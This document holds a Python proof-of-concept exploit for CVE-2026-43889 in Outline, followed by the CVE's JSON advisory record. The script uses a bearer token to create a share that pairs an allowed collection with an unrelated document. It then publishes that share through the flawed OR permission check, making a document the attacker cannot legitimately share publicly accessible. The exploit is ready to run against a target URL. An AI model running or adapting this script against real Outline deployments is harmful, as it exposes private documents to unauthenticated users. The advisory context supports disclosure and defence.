CVE-2026-43889

import requests # Configuration TARGET_URL = "https://outline.example.com" ATTACKER_TOKEN = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..." # Headers headers = { "Authorization": f"Bearer {ATTACKER_TOKEN}", "Content-Type": "application/json" } # Step 1: Create a share resource # Attacker has 'share' permission on collection_id_A, but only 'read' on document_id_B payload_create = { "collectionId": "collection_id_A", "documentId": "document_id_B", "published": False } response = requests.post(f"{TARGET_URL}/api/shares.create", json=payload_create, headers=headers) if response.status_code == 200: share_id = response.json()['data']['id'] print(f"[+] Share created with ID: {share_id}") else: print("[-] Failed to create share") exit() # Step 2: Update the share to publish it # The backend checks: canShare(collection_id_A) OR canShare(document_id_B) # Since canShare(collection_id_A) is True, the publish succeeds. payload_update = { "id": share_id, "published": True } response = requests.post(f"{TARGET_URL}/api/shares.update", json=payload_update, headers=headers) if response.status_code == 200: share_url = response.json()['data']['url'] print(f"[+] Exploit successful! Document is now public: {share_url}") else: print("[-] Failed to publish share")

{"cve": {"id": "CVE-2026-43889", "sourceIdentifier": "[email protected]", "published": "2026-05-11T22:22:13.760", "lastModified": "2026-05-11T22:22:13.760", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Outline is a service that allows for collaborative documentation. Prior to 1.7.0, the shares.create API accepts both collectionId and documentId simultaneously and, when published=false, only verifies read access for each—skipping the \"share\" permission check. A subsequent shares.update authorizes publication using an OR policy (can share collection OR can share document), so an attacker who holds share permission on one unrelated collection can publish a share that exposes an arbitrary document they cannot legitimately share, making it publicly accessible to unauthenticated users. This vulnerability is fixed in 1.7.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "references": [{"url": "https://github.com/outline/outline/security/advisories/GHSA-rg4j-pmch-w6pm", "source": "[email protected]"}]}}